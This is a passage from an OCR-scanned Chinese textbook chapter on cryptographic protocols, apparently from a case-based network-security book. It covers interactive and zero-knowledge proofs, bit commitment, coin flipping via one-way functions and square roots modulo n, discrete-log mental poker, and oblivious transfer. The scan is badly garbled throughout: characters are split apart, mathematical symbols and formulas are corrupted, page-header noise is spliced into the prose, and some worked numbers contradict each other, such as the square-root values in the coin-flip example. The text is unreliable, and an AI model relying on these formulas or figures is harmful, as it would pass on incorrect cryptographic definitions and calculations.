秘密 ,而 基于 非 对 称 密 钥 或 Hash 值 的 挑战 -应 答 中 证 明 者 就 是 “不 知道 ?这 个 秘密 。 

(3) 零 知 识 协议 中 ,验证 者 只 知道 证 明 者 有 或 者 没有 这 个 秘密 , 即 结果 为 “是 ?或 “不 
是 ”, 只 是 一 个 一 比特 大 小 的 信息 ; 而 挑战 -应 答 协 议 中 的 验证 者 若 属于 不 知道 证 明 者 秘密 
的 情况 , 则 验证 者 也 可 获得 关于 秘密 的 部 分 比特 信息 。 


8.1.2 交互 证 明 系 统 


在 数学 中 ,为 了 证 明 一 个 命题 ,其 方法 都 是 罗列 出 一 串 过 程 ,或 者 说 是 证 据 , 然 后 利用 最 
基本 的 公理 的 正确 性 以 及 证 据 之 间 的 逻辑 关系 ,最 终 得 到 命题 的 正确 性 。 其 实 简化 一 些 来 
看 ,这 个 过 程 就 是 证 明 者 为 了 证 明 某 个 命题 的 正确 性 ,从 而 将 一 些 证 据 都 列举 出 来 ,他 认为 
从 这 些 证 据 可 以 得 出 命题 的 正确 性 。 

而 对 其 他 人 ( 称 作 验 证 者 ) 来 说 ,如 果 要 检验 证 明 者 的 结果 ,只 要 将 其 证 明 的 过 程 验 证 一 
遍 , 按 照 其 证 据 之 间 的 关系 以 及 某 些 公理 假设 ,看 是 否 可 以 最 终 得 到 其 所 提出 的 命题 的 正确 
性 ,如 果 可 以 ,就 认为 这 个 命题 是 正确 的 ,否则 为 假 。 

这 个 过 程 可 以 简单 地 看 作 一 个 一 轮 的 交互 过 程 或 者 证 据 , 即 证 明 者 将 他 的 证 明 过 程 发 
送 给 验证 者 ,然后 由 验证 者 验证 。 

而 交互 证 明 系 统 (Interactive Proof Systems,IPS) 正 是 将 以 上 的 数学 证 明 方 法 推广 的 
一 个 模型 。 交 互 证 明 系统 由 两 方 组 成 : 一 方 称 为 证 明 者 (Prover), 一方 称 为 验证 者 


8.1 零 知识 洞穴 


(Verifier)。 对 于 给 出 的 某 个 命题 ,证 明 者 总 是 要 说 服 验 证 者 命题 的 正确 性 (不 管 这 个 命题 
本 身 是 否 真 的 正确 )。 证 明 的 方法 就 是 以 上 交互 的 过 程 ,不 过 不 仅仅 限定 在 一 轮 , 即 证 明 者 
告知 验证 者 某 些 证 据 , 验 证 者 在 得 到 这 些 证 据 后 验证 其 正确 性 ,同时 ,验证 者 可 能 还 会 有 疑 
问 ,他 可 以 向 证 明 者 提出 问题 ,证明 者 需要 回答 这 些 问 题 。 并 且 双 方 在 交互 中 都 可 以 使 用 随 
机 串 , 即 验证 者 可 能 有 很 多 问题 需要 证 明 者 来 回答 ,但 是 他 没有 办 法 等 待 这 么 多 时 间 来 验证 
所 有 问题 的 答案 ,所 以 他 会 采用 随机 的 方法 ,从 中 选取 一 些 题目 要 求证 明 者 回答 。 

在 进行 完 所 有 的 交互 以 后 ,验证 者 判断 证 明 者 给 出 的 证 明 过 程 是 否 足以 证 明 命题 的 正确 性 。 

交互 证 明 系 统 最 初 由 Goldwasser、Mieali 和 Raekoff 以 及 Babai 分 别提 出 。 

定义 8.1 一 个 语言 L 的 交互 证 明 系 统 是 一 个 由 证 明 者 和 验证 者 组 成 的 交互 过 程 , 它 
们 有 共同 的 输入 ,并 且 它 们 的 交互 过 程 满足 如 下 的 条 件 : 

(1) 验证 者 的 策略 是 一 个 概率 多 项 式 时 间 的 过 程 。 

(2) 证 明 者 的 计算 能 力 没 有 限制 。 

(3) 正确 性 要 求 。 

。 完备 性 : 存在 一 个 证 明 策略 P, 对 于 任意 的 xEL, 当 交互 的 输入 为 x 时 ,证 明 者 P 可 

以 以 至 少 2/3 的 概率 使 得 验证 者 接受 。 
。 可 靠 性 : 对 于 任意 的 zfL, 当 交互 的 输入 为 zx 时 ,对 于 证 明 者 的 任意 的 策略 P” ,至 
多 只 能 以 1/3 的 概率 使 得 验证 者 接受 。 

Babai 所 定义 的 交互 证 明 系 统 被 称 为 Arthur-Merlin Games。 它 与 交互 证 明 系 统 不 同 
之 处 在 于 : 它 的 验证 者 Arthur: 被 要 求 只 能 给 证 明 者 Merlin 随机 串 ,而 不 能 是 由 验证 者 计 
算出 来 的 信息 。 这 种 系统 又 被 称 作 公开 掷 币 系 统 (PublicCoin Systems)。 虽 然 在 形式 上 有 
所 不 同 , 但 在 1986 年 Goldwasser 和 Sipser 证 明了 这 两 种 系统 在 计算 能 力 上 是 等 价 的 。 


8.1.3 零 知 识 证 明 


Goldwasser 最 早 提 出 了 零 知识 证 明 的 概念 , 即 验 证 者 (verifier) 在 参与 了 零 知识 证 明 过 
程 后 ,任何 能 在 多 项 式 时 间 内 计算 出 的 信息 ,也 能 在 多 项 式 时 间 后 被 验证 者 独立 计算 出 ,只 
要 他 相信 命题 的 真实 性 。 

对 零 知识 证 明 系 统 的 定义 主要 考虑 两 种 不 同 的 概率 分 布 : 

(1) 在 执行 完 与 证 明 者 (prover) 的 交互 过 程 后 ,由 多 项 式 时间 的 验证 者 生成 的 概率 分 布 。 

(2) 一 台 概 率 多 项 式 时 间 自 动机 在 基于 待 证 明 命题 正确 性 的 前 提 下 生成 的 概率 分 布 。 

由 此 产生 了 3 种 不 同 程度 的 关于 零 知 识 证 明 系 统 的 定义 。 

(1) 完美 零 知 识 : 在 这 种 系统 中 上 述 两 种 分 布 完全 相同 。 

(2) 计算 零 知 识 : 在 这 种 系统 中 上 述 两 种 分 布 在 多 项 式 时 间 内 不 可 分 辨 , 即 两 种 分 布 
不 能 被 任何 概率 多 项 式 时 间 的 测试 区 分 开 。 

(3) 统计 零 知 识 : 在 这 种 系统 中 上 述 两 种 分 布 在 统计 特性 上 接近 , 即 二 者 之 间 的 统计 
差别 可 以 忽略 不 计 。 

经 典 环境 中 ,在 单 向 函数 存在 的 前 提 下 .Goldreich 等 证 明了 对 于 任何 NP 语言 都 存在 
计算 性 的 零 知 识 证 明 系统 ,从 而 解决 了 关于 计算 性 的 零 知 识 证 明 系 统 的 存在 情况 问题 。 但 
是 关于 完美 的 零 知 识 证 明 系 统 的 存在 性 问题 情况 却 有 所 不 同 。 显 然 , 对 于 任何 属于 BPP 范 
围 内 的 语言 都 存在 平凡 的 、 完 美的 零 知 识 证 明 系 统 。 但 对 于 非 平 凡 的 完美 零 知识 证 明 系统 ( 即 


两 方 魏 会 放 议 


贡 co 站 


基于 案例 的 网 络 安 会 技术 与 实践 


对 于 不 在 BPP 范围 内 的 语言 的 完美 零 知识 证 明 系统 ) 的 存在 问题 ,还 远 未 得 到 彻底 解决 。 
定理 8.1 任何 NP 断言 都 存在 零 知 识 交 互 式 证 明 系 统 ; 任何 零 知 识 交 互 式 证 明 系 统 
都 可 变换 成 非 交互 式 零 知识 证 明 系统 。 


8.2 比特 承诺 协议 : 说 到 就 该 做 到 


8.2.1 比特 承诺 简介 


比特 承诺 (Bit Commitment,BC) 是 密码 学 中 的 重要 基础 协议 ,其 概念 最 早 由 1995 年 图 
灵 奖 得 主 Manuel Blum 提出 。 比 特 承 诺 方 案 可 用 于 构建 零 知 识 证 明 、 可 验证 秘密 分 享 、 硬 币 
投 搓 等 协议 ,同时 和 茫然 传送 一 起 构成 安全 双方 计算 的 基础 ,是 信息 安全 领域 研究 的 热点 。 

比特 承诺 的 基本 思想 如 下 : 发 送 者 Alice 向 接收 者 Bob 承诺 一 个 比特 5( 也 可 以 是 比特 
串 ) ,要 求 : 在 第 一 阶段 即 承诺 阶段 Alice 向 Bob 承诺 这 个 比特 0, 但 是 Bob 无 法 知道 45 的 信 
息 ; 在 第 二 阶段 即 揭示 阶段 Alice 向 Bob 证 实 她 在 第 一 阶段 承诺 的 确实 是 50, 但 是 Alice 无 
法 欺骗 Bob( 即 在 第 二 阶段 臭 改 6b 的 值 ) 。 

经 典 环境 中 关于 比特 承诺 的 一 个 形象 的 例子 是 : Alice 将 待 承 诺 的 比特 或 秘密 写 在 一 
张 纸 上 ,然后 将 这 张 纸 锁 进 一 个 保险 箱 ,该 保险 箱 只 有 唯一 的 钥匙 可 以 打开 。 在 承诺 阶段 ， 
Alice 将 保险 箱 送 给 Bob ,但 是 保留 钥匙 : 到 了 揭示 阶段 ,Alice 将 比特 或 秘密 告诉 Bob ,同时 
将 钥匙 传 给 Bob 使 其 相信 自己 的 承诺 。 简 单 的 示意 图 如 图 8. 2 和 图 8. 3 所 示 。 


NR > 


Alice Bob Alice Bob 
图 8.2 承诺 阶段 ,Alice 将 写 有 待 承诺 信息 的 纸 锁 图 8.3 揭示 阶段 ,Alice 告诉 Bob 承诺 信息 ， 
进 保险 箱 , 然 后 传送 给 Bob 并 将 保险 箱 的 钥匙 传送 给 Bob 


一 个 比特 承诺 方案 必须 具备 下 列 性 质 。 

正确 性 : 如 果 Alice 和 Bob 均 诚 实地 执行 协议 ,那么 在 揭示 阶段 Bob 将 正确 获得 Alice 
承诺 的 比特 0。 

保密 性 : 在 承诺 阶段 Bob 不 能 获知 5b 的 信息 。 

绑 定性 : 在 承诺 阶段 结束 之 后 ,Bob 只 能 在 揭示 阶段 获得 唯一 的 5b( 即 Alice 无 法 将 5 反 
转 , 就 好 像 Alice 与 多 绑 定 ? 在 一 起 一 样 ) 。 


8.2.2 比特 承诺 实例 


1. 利用 单 向 函数 的 比特 承诺 方案 

(1) Alice, 或 Alice 与 Bob 共同 选 定 一 个 单 向 函数 hh。 

(2) Alice 随机 产生 两 个 比特 串 : R 和 R,。 

(3) Alice 选 定 她 要 承诺 的 比特 5( 可 能 是 一 个 比特 或 一 个 比特 串 )。 

(4) Alice 计算 单 向 函数 值 h(Ri ,Rs ,0) ,并 将 结果 及 其 中 一 个 随机 串 , 如 Ri ,一 起 发 送 


给 Bob。(h(Ri,R,,5) ,Ri1) 是 Alice 的 承诺 证 据 。Alice 在 第 (4) 步 使 用 单 向 函数 及 随机 串 
阻止 Bob 对 函数 求 逆 以 确定 比特 0。 

当 需 要 Alice 揭示 她 的 比特 承诺 时 ,继续 下 列 操作 : 

(5) Alice 将 (Ri ,Rs,0) ,或 者 与 (Ri ,Rs,0) 单 向 函数 一 起 发 送 给 Bob。 

(6) Bob 计算 CR, ,Ra ,65) 的 单 向 函数 值 ,并 将 该 值 \Ri、(Ri,R,,6), 以 及 原先 第 (4) 步 收 
到 的 单 向 函数 值 进行 比较 ,检验 比特 的 有 效 性 。 

2. 利用 对 称 密码 算法 的 比特 承诺 方案 

(1) Alice, 或 Alice 与 Bob 共同 选 定 一 个 对 称 密码 算法 E。 

(2) Bob 产生 一 个 随机 比特 串 R, 并 把 它 发 送 给 Alice。 

Alice 首先 生成 一 个 由 她 想 承诺 的 比特 5, 然 后 利用 某 个 对 称 加 密 算法 E, (下 标 & 是 
Alice 随机 选 定 的 一 个 加 密 密 钥 ) ,对 (R,5) 进 行 加 密 运 算得 出 Ei (R,5) 的 值 ,将 发 送 给 Bob。 

当 需 要 Alice 揭示 她 的 比特 承诺 时 ,继续 下 列 操作 : 

(3) Alice 将 密 钥 及 b 发 送 给 Bob。 

(4) Bob 利用 密 钥 解密 C, 并 利用 他 的 随机 串 R 检验 比 特 6 的 有 效 性 。 

3. Goldwasser-Micali 比特 承诺 方案 

(1) 比特 承诺 函数 选 定 : 设 "= pg 是 两 个 大 素数 p 与 g 之 积 ,t 是 模 n 的 一 个 随机 选取 
的 平方 非 剩余 。 取 

X=Y=2;,f:{0,1} XX >Y,(b,7) tr’ (mod n) 

(2) 比特 承诺 的 实施 

J@D 承诺 者 P 随机 选取 比特 串 zxEZ; 。 

@ P 选 定 要 承诺 的 比特 5, 计算 f(5,z) 二 tt? (mod n) 并 计 该 值 为 C, 发 送 给 验证 者 V。 

(3) 比特 承诺 的 揭示 

@@P 将 1 与 (0,z) 发 送 给 V。 

@@V 计算 wr?(mod n), 并 与 5 比较 是 否 相 等 以 检验 承诺 的 比特 的 C 有 效 性 。 


8.3 掷 币 协议 : 看 运气 


场景 实例 : 一 个 朋友 没有 意识 到 Alice 和 Bob 不 在 一 个 地 方 , 留 给 他 们 了 一 辆 汽车 。 
他 们 将 怎样 决定 汽车 的 归属 呢 ? Bob 打 个 电话 给 Alice 建议 由 他 投 币 来 决定 。Alice 说 选 
择 “ 背 面 ”, 但 Bob 说 我 投 出 的 是 “正面 "。 于 是 车 归 了 Bob。 这 里 Alice 完全 有 理由 怀疑 Bob 
的 诚实 。 下 一 次 ,她 可 能 选择 别 的 办 法 决定 这 一 问题 。 

这 里 有 一 个 思路 ,就 是 Alice 随机 地 选择 一 个 比特 b, 发 给 Bob, Bob 也 随机 地 选择 一 个 
比特 b, 发 给 Alice, 投 币 的 结果 就 是 六 2%;。 问 题 就 是 谁 先 发 送 ,如 果 Alice 先 ,Bob 将 可 以 
选择 bs 来 控制 投 币 的 结果 。 这 并 不 公平 。 

公平 投 币 的 要 求 如 下 : 

(1) Bob 必须 在 听 到 Alice 猜测 之 前 就 已 经 投 币 。 

(2) Bob 不 能 够 在 听 到 Alice 猜测 之 后 重复 投 币 。 

(3) Alice 不 能 在 其 猜测 之 前 得 到 投 币 结果 。 

实例 : 采用 单 向 函数 的 抛 币 协 议 。 

如 果 Alice 和 Bob 对 使 用 一 个 单 向 函数 达成 一 臻 意见, 协议 非常 简单 : 


两 广安 会 放 议 


贡 co 站 


秦 于 案例 的 网 络 安全 技术 与 实践 


(1) Alice 选择 一 个 随机 数 x, 她 计算 > 二 f(x), 这 里 f(z) 是 单 向 函数 。 

(2) Alice 将 > 送 给 Bob。 

(3) Bob 猜测 z 是 偶数 或 奇数 ,并 将 猜测 结果 发 给 Alice。 

(4) 如 果 Bob 的 猜测 正确 , 抛 币 结果 为 正面 ; 如 果 Bob 的 猜测 错误 , 则 抛 币 的 结果 为 反 
Alice 公布 此 次 抛 币 的 结果 ,并 将 z 发 送 给 Bob。 

(5) Bob 确信 yy = 二 f(x)。 

实例 : 使 用 平方 根 的 投 币 ,流程 如 图 8.4 所 示 。 


协议 : 使 用 平方 根 的 投 币 协议 。 

摘要 : 用 户 Alice 和 Bob 在 公共 信道 上 交互 4 条 消息 。 

结果 : Alice 或 Bob 赢得 投 币 猜测 。 

在 每 次 投 币 会 话 中 执行 如 下 步骤 : 

(1) Alice 选择 两 个 大 的 随机 素数 p 和 9g, 都 为 模 4 余 3 型 。 她 将 p 和 9g 保密 ,而 将 n= 二 p，g 发 
给 Bob。 

(2) Bob 随机 选择 一 个 整数 z 并 计算 y 三 x* (mod n)。 他 将 x 保 密 但 发 送 y 给 Alice。 

(3) Alice 使 用 她 用 p 和 g 计算 4 个 y 模 n 的 平方 根 士 a、 士 5。 她 任意 选择 一 个 ,假定 为 5, 并 发 


给 Bob。 

(4) 如 果 b 硅 士 x(mod n) ,Bob 告诉 Alice 她 赢 。 如 果 0 天 士 zxCmod nn) ,Bob 赢 。 
Alice Bob 
n=p"g ” 

5 
6 
:= 
a Alice 启 (6 三 十 
or Bob 赢 (b 闫 十) 
说 明 : 


(1) 如 果 Alice 发 送 5 给 Bob 并 且 z 三 土 a(mod nn) , 则 Bob 知道 y(mod n) 的 全 部 4 个 平方 根 ,因此 ， 
可 以 分 n。 也 就 是 (x 一 b,n) 给 出 了 nn 的 一 个 非 平凡 因子 。 由 此 可 知 如 果 分 解 n 在 计算 上 不 可 
能 ,Bob 能 得 到 因子 p 和 9g 的 原因 只 能 是 Alice 发 送 的 值 不 是 士 z-。 如 果 Alice 发 送 给 Bob 的 是 
土 x,Bob 除了 Alice 发 送 的 数字 n 以 外 ,没有 获得 更 多 的 信息 。 因 此 ,他 不 可 能 得 到 因子 p 和 4g。 
Alice 可 以 要 求 Bob 提交 n 的 分 解 来 验证 其 确实 没有 欺骗 。 

(2) 如 果 Alice 欺骗 Bob 发 一 个 随机 数字 而 y 的 平方 根 给 Bob, 则 可 以 阻止 Bob 分 解 n。 但 是 ,Bob 
可 以 通过 平方 是 与 y 同 余 来 验证 Alice 发 来 的 数字 。 

(3) 如 果 Alice 发 一 个 素数 而 不 是 多 个 素数 的 乘积 给 Bob。 当 然 ,Bob 可 以 要 求 Alice 在 游戏 之 后 出 
示 nn 的 分 解 。 另 一 种 情况 是 Alice 通过 发 送 给 Bob 3 个 素数 的 乘积 。 但 这 将 得 到 y 的 8 个 平方 
根 。 这 种 情况 下 ,Alice 有 4 种 选择 ,有 3 种 都 会 导致 对 的 分 解 ,因此 ,她 不 会 这 样 做 。 

(4) 在 这 一 过 程 中 有 瑕 盖 。 假 定 Bob 决定 故意 输 掉 猜测 。 他 可 以 宣称 Alice 发 来 的 就 是 他 已 经 有 的 
Z。Alice 将 无 从 判断 这 一 点 ,因为 她 知道 的 信息 仅仅 是 Bob 提供 的 模 的 平方 数 。 例 子 : Alice| 
选择 p 二 2038074743 和 gq 二 1190494759。 她 发 送 n= 二 p*g 二 2426317299991771937 给 Bob。Bob 
选择 z= 二 1414213562373095048, 计 算 y 三 x’ 三 363278601055491705(mod n) ,将 其 发 送 给 Alice。 
Alice 计 算 y** ”二 1701899961(mod 加 和 ys ”三 325656728(mod gq)。 因 此 ,她 可 以 得 到 zx 三 
士 1701899961(mod p) 和 zx 三 士 325656728(mod gq)。 中 国 剩余 定理 将 据 此 得 到 4 个 根 : zx 二 十 
1012103737618676889 或 土 937850352623334103(mod n) 。 假 定 Alice 发 送 10121037618676889 
给 Bob, 这 里 是 一 x(mod n) ,因此 ,Bob 只 能 宣布 Alice 赢 。 假 如 Alice 发 送 937850352623334103 
给 Bob, 则 Bob 宣布 自己 赢 ,并 且 可 以 计算 (1414213562373090548 一 937850352623334103 ,m) 一 
1190494759 来 支持 自己 的 结论 。 


图 8.4 平方 根 的 投 币 协议 


8.4 电话 扑克 协议 : 公平 的 游戏 


一 个 类 似 于 公平 投 币 的 协议 就 是 电话 扑克 协议 , 它 允 许 Alice 和 Bob 在 电话 两 端 玩 扑 
克 。 不 同 于 处 理 “ 正 面 " 和 “反面 ”两 条 消息 ,Bob 需要 处 理 分 别 代 表 每 一 张 牌 的 52 个 数字 
cy ce， Css。 如 何 保证 在 游戏 中 没有 欺诈 ? 

思路 : Bob 用 自己 的 加 密 密 钥 加 密 牌 ci ,cs,… ,css 发 送 给 Alice。Alice 随机 选择 5 张 
牌 ,用 自己 的 加 密 密 钥 加 密 ,发 还 给 Bob。Bob 解密 这 些 牌 后 发 还 给 Alice, 她 再 解密 决定 自 
己 手中 的 5 张 牌 。Alice 再 随机 选择 5 张 牌 发 给 Bob。Bob 解密 它们 得 到 自己 的 5 张 牌 。 
在 游戏 的 过 程 中 , 剩 下 的 牌 可 以 按照 同样 的 方法 发 出 。 在 游戏 结束 后 ,Alice 和 Bob 都 公布 
自己 的 牌 和 密 钥 对 以 确定 没有 人 在 游戏 中 欺骗 。 

实例 : 基于 离散 对 数 的 两 方 扑 克 协 议 , 流 程 如 图 8. 5 所 示 。 


协议 :基于 离散 对 数 问题 的 扑克 协议 。 

摘要 : 游戏 者 Alice 和 Bob 在 公共 信道 交互 4 条 消息 。 

结果 : 两 个 游戏 者 各 得 到 5 张 牌 。 

扑克 会 话 执行 如 下 步骤 : 

(1) Alice 和 Bob 协商 一 个 适当 的 素数 p。Alice 选择 一 个 秘密 整数 a 满足 gcd(a,z 一 1)=1, 并 
计算 a 满足 a* a' 三 1 mod(p 一 1)。Bob 选择 一 个 秘密 整数 8 满足 gcd(B,p 一 1) 二 1, 并 计算 
B' 满 足 8，B' 三 1mod(p 一 1) 。( 在 每 次 不 同 的 扑克 游戏 中 要 选用 不 同 的 pa 和 PB。) 

(2) 52 张 牌 用 52 个 预先 双方 确认 的 模 p 不 同 数字 cc ,cs，… ,cess 表示 。Bob 计算 b, 三 cf(mod 
力 ) ,这 里 1<i<<52, 并 发 送 它 们 给 Alice。 

(3) Alice 选择 5 个 数字 6b ,六 ,… ,6b ,计算 如 (mod p) ,这 里 1<j 二 5, 并 发 送 这 些 数字 给 Bob。 

(4) Bob 对 这 些 数 字 做 8 次 宕 ,并 将 它们 发 还 给 Alice。Alice 对 这 些 数字 做 a 次 军 。 这 些 就 是 
Alice 手中 的 牌 。 

(5) Alice 再 随机 选择 5 个 数字 名 ,6b ，… ,6b ,并 发 送 它们 给 Bob。Bob 计算 成 (mod p), 这 里 1 
<j<5。 

这 些 就 是 Bob 手中 的 牌 。 


妈 三 dlmod p) ,这 里 1<i<52 
Bob 一 一 Alice 


所 (mod p), 这 里 1<j<<5 


( 姑 ) (mod p), 这 里 1<j<<5 


名 ,这 里 1<j<5 


(bi )” (mod p) ;=((6 )’ )" (mod p) 


8.5 基于 离散 对 数 的 两 方 扑 克 协 议 


实例 : 可 以 很 容易 地 将 两 方 扑克 协议 扩展 到 三 方 。 

。 Alice .Bob 和 Carol 都 产生 一 个 公 钥 / 私 钥 密 钥 对 。 

根据 加 密 可 交换 性 质 , 有 Mua.e 一 Me.n 。 

。 Alice 产生 52 个 消息 (可 验证 的 唯一 的 随机 串 ) ,每 个 代表 一 副 牌 中 的 一 张 牌 。Alice 
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用 她 的 公 钥 加 密 所 有 这 些 消息 ,并 将 它们 发 送 给 Bob。 

Bob ,由 于 不 能 阅读 任何 消息 ,他 随机 地 选择 5 张 牌 。 他 用 他 的 公 钥 加 密 , 并 把 它们 
回 送 给 Alice。Bob 将 余下 的 47 张 牌 送 给 Carol。 

Carol, 由 于 不 能 阅读 任何 消息 ,也 随机 选 5 个 消息 。 她 用 她 的 公 钥 加 密 , 并 把 它们 


送 给 Alice。 
。 Alice 也 不 能 阅读 回 送 给 她 的 消息 ,她 用 她 的 私 钥 对 它们 解密 ,然后 送 给 Bob 或 
Carol( 依 据 来 自 谁 而 定 )。 


Bob 和 Carol 用 他 们 的 密 钥 解密 并 获得 他 们 的 牌 。 
Carol 从 余下 的 42 张 牌 中 随机 取 5 张 ,把 它们 发 送 给 Alice。 

。 Alice 用 她 的 私 钥 解密 消息 获得 她 的 牌 。 

例子 : 考虑 一 个 简单 的 只 有 5 张 牌 : 10,J,Q,K,A 的 游戏 。 每 个 游戏 者 发 一 张 牌 。 

将 牌 变 成 双方 认可 的 数字 10 王 200514,J 王 10010311,Q 王 1721050514,K 王 11091407， 
A 二 10305。 令 素数 为 p 二 2396271991。Alice 选择 一 个 秘密 整数 a 二 1234567, Bob 选择 一 
个 秘密 整数 B= 二 7654321。Alice 计算 a 二 402406273,Bob 计算 8 二 200508901。Bob 现在 计 
算 ( 模 pp 同 余 ): 200514s 寺 914012224;10010311? 圭 1507298770;1721050514? 夺 74390103; 
11091407? 圭 2337996540; 103058 三 1112225809。Bob 洗 牌 后 将 这 些 数字 发 给 Alice: 
1507298770,1112225809,2337996540,914012224,74390103。Alice 现在 在 其 中 选择 一 张 她 
的 牌 ,例如 ,第 4 张 计算 a 次 窘 ,并 发 送 给 Bob: 914012224* 圭 1230896099(mod p)。Bob 计 
算 8 次 寡 并 将 其 送 还 Alice: 1230896099F 圭 1700536007(mod p)。Alice 现在 计算 w' 次 寡 ， 
1700536007* 硅 200514(mod p)。 因 此 ,她 的 牌 就 是 10。 现 在 Alice 从 Bob 发 来 的 牌 中 再 选 
一 张 ,例如 ,1507298770 并 发 还 给 Bob。Bob 计算 15072987708 三 10010311(mod p)。 因 此 ， 
他 的 牌 就 是 J。 

为 了 防止 欺骗 ,Alice 和 Bob 接 下 来 公布 他 们 的 秘密 a 和 有 8。 如 果 Alice 试图 声称 自己 
选择 的 是 K。Bob 可 以 很 快 地 计算 a 并 展示 Alice 拿 到 的 是 10。 

在 游戏 结束 时 ,Alice、Bob 和 Carol 都 出 示 他 们 的 牌 以 及 他 们 的 密 钥 ,以 便 每 人 都 确信 
没有 人 作 刺 。 


8.5 不 经 意 传输 协议 : 版 权 的 秘密 


不 经 意 传 输 或 称 健忘 传输 (Oblivious Transfer,OT) 是 设计 其 他 密码 协议 的 基础 。OT 
可 以 用 来 构造 更 为 复杂 的 协议 ,不 经 意 电路 计算 (Oblivious Circuit Evaluation) 。 同 时 ,不 
须 任何 假设 ,利用 它 可 以 为 NP 构造 一 个 零 知识 证 明 。 

不 经 意 传输 协议 最 早 是 由 Rabin 于 1981 年 提出 的 。 在 OT 中 ,有 2 个 参与 者 ,假设 其 
中 一 方 为 Alice( 发 送 方 ) , 另 一 方 为 Bob( 接 收 方 )。 在 该 协议 中 ,Alice 输入 1 个 消息 ME 
{0,1)*,Alice 和 Bob 通过 一 定 的 方式 交互 之 后 ,Bob 只 能 以 1/2 的 概率 接收 到 M( 对 Alice 
的 隐私 性 ) ,而 且 ,Alice 无 法 知道 Bob 是 否 得 到 了 M( 对 Bob 的 隐私 性 )。Bob 可 以 确信 地 
知道 他 是 否 得 到 了 消息 M( 正 确 性 ) 。 

比 2 取 1 不 经 意 传 输 更 一 般 的 不 经 意 传 输 协议 是 取 1 不经意 传输 。 在 这 个 协议 中 ， 
Bob 只 能 得 到 则 消息 中 的 1 个 。 


nn 取 m 不 经 意 传 输 (0 二 m 一 n) 是 所 有 的 不 经 意 传输 协议 中 最 一 般 的 , 即 Alice 有 7 个 输 
入 ,Bob 只 能 得 到 其 中 的 个 。 

起 初 ,不 经 意 传输 协议 可 以 简单 概括 为 拥有 以 下 两 点 特性 : 

。 设 A 有 一 个 秘密 , 想 以 1/2 的 概率 传递 给 B, 即 B 有 50% 概率 收 到 该 秘密 。 

。 协议 执行 完 后 ,A 不 知道 B 是 否 收 到 这 个 秘密 。 

进一步 地 ,可 以 将 定义 形式 化 为 以 下 两 种 情况 ,如 图 8.6 所 示 。 


定义 1 2 取 1 不 经 意 传输 (OT:) 

在 一 个 两 方 协议 中 ,Alice 的 输入 为 2 个 消息 M, .ME {0,1)* ,Bob 的 输入 为 cE {0,1) ,如 果 
一 个 协议 为 2 取 1 不 经 意 传输 协议 ,必须 满足 如 下 3 个 条 件 : 

正确 性 一 一 在 Bob 和 Alice 都 是 诚实 的 前 提 下 ,Bob 总 可 以 得 到 M. 。 

对 Bob 的 隐私 性 一 一 Alice 无 法 知道 Bob 的 选择 c。 

对 Alice 的 隐私 性 一 一 Bob 无 法 得 到 另 一 个 M,_.。 

定义 2 n 取 m 不 经 意 传输 (OT”) 

在 一 个 两 方 协议 中 ,Alice 的 输入 为 n 个 消息 M, ,…,M,E{10,1}*,Bob 的 输入 为 m 个 不 同 的 
选择 ci ，… ,cn E {1,2,…,n) ,如 果 一 个 协议 为 n 取 m 不经意 传输 协议 ,必须 满足 如 下 3 个 
条 件 : 

正确 性 一 一 在 Bob 和 Alice 都 是 诚实 的 前 提 下 ,Bob 得 到 MiE (a, cs ,cn)。 

对 Bob 的 隐私 性 一 一 Alice 无 法 知道 Bob 的 选择 j ,jE€ {c ,cs ，*… ,cn)。 

对 Alice 的 隐私 性 一 一 Bob 无 法 得 到 其 他 消息 Mj ,jE {1,2,…， 对 一 {cycs ,cv)。 


图 8.6 不 经 意 传输 协议 形式 化 定义 
(1) 基于 大 数 分 解 的 2 取 1 不 经 意 传输 协议 ,如 图 8.7 所 示 。 


。 A 想 通 过 不 经 意 传输 协议 传 给 B 大 数 n 的 因子 分 子 。 

。 如 果 已 知 某 数 在 模 nn 下 的 两 个 不 同 的 平方 根 ,就 可 以 分 解 n。 

(1) B 随机 选 一 个 数 zx, 将 发 给 A。 

(2) A( 掌 握 n 的 分 解 ) 计 算 xz*mod n 的 4 个 平方 根 士 x 和 土 y, 将 其 中 之 一 发 给 B。 

(3) B 检 查收 到 的 数 是 否 与 土 z 在 模 下 同 余 , 如 果 是 ,B 没有 得 到 任何 新 的 信息 ,否则 B 掌 
握 了 zsmod n 的 两 个 不 同 的 平方 根 ,从 而 可 以 分 解 n, 而 A 确 不 知道 究竟 是 哪 种 情况 。 


图 8.7 基于 大 数 分 解 的 2 取 1 不 经 意 传输 协议 


(2) 利用 2 取 1 不经意 传输 构造 取 1 不经意 传输 ,如 图 8. 8 所 示 。 

(3) 利用 nn 取 1 不 经 意 传输 构造 取 m 不 经 意 传输 ,如 图 8.9 所 示 。 

(4) 基于 一 般 公 钥 密码 系统 的 2 取 1 不 经 意 传输 协议 ,如 图 8. 10 所 示 。 

设 在 一 个 公 钥 密码 系统 中 ,有 一 个 加 密 函 数 下 ,一 个 解密 函数 也 ,一 个 公 钥 Key, ,一 个 
私 钥 key, ( 密 钥 长 度 满足 |Key, | = | key。| 一 k) 。 满 足 : String 一 DCE(CString,key) ,key。) 。 
在 任意 一 个 安全 的 公 钥 密码 系统 中 ,对 于 某 个 特定 的 公 钥 ,无 法 计算 出 对 应 的 私 钥 ,或 者 说 
计算 出 对 应 的 私 钥 很 难 。 

此 外 ,不 经 意 签 名 的 基本 思想 如 下 : 

(1) Alice 及 n 份 不 同 的 消息 。Bob 可 以 选择 其 中 之 一 给 Alice 签名 ,Alice 没有 办 法 知 
道 她 签 的 哪 一 份 消 息 。 

(2) Alice 有 一 份 消息 。Bob 可 以 选择 个 密 钥 中 的 一 个 给 Alice 签署 消息 用 ,Alice 无 
法 知道 她 用 的 哪 一 个 密 钥 。 


两 广安 会 帮 议 


贡 co 站 


秦 于 案例 的 网 络 安全 技术 与 实践 


协议 : 在 OT! 中 ,Alice 有 输入 M,,…,M,E {0,1)*。Bob 有 输入 sE {1,2,…,n)。 构 造 OT 
如 下 : 
OT (Mi, », M,)(s) 

(1) Alice 随机 选择 nn 个 串 记 ,rr ，…, rE {0,1)*。 
(2) Bob 根据 * 确定 ci, cz,…,c,E{0,1}, 即 = c= =c = 0,6= "=0= 1。 
(3) Alice 和 Bob 执行 n 个 OT; 协议 OTi(n, Mi) (0),OTi(r;, M; @n)(c),* ,OTi(r,, 

M, Br Br: OB),). 
(4) Bob 可 以 得 到 M,=(M, 四 六 @r; @*…@r_)On Or DOr 1). 
证 明 : 
正确 性 : 在 Alice 和 Bob 执行 个 OT 协议 中 ,由 OT3 协议 的 正确 性 可 知 ,由 于 一 ce 一 … 
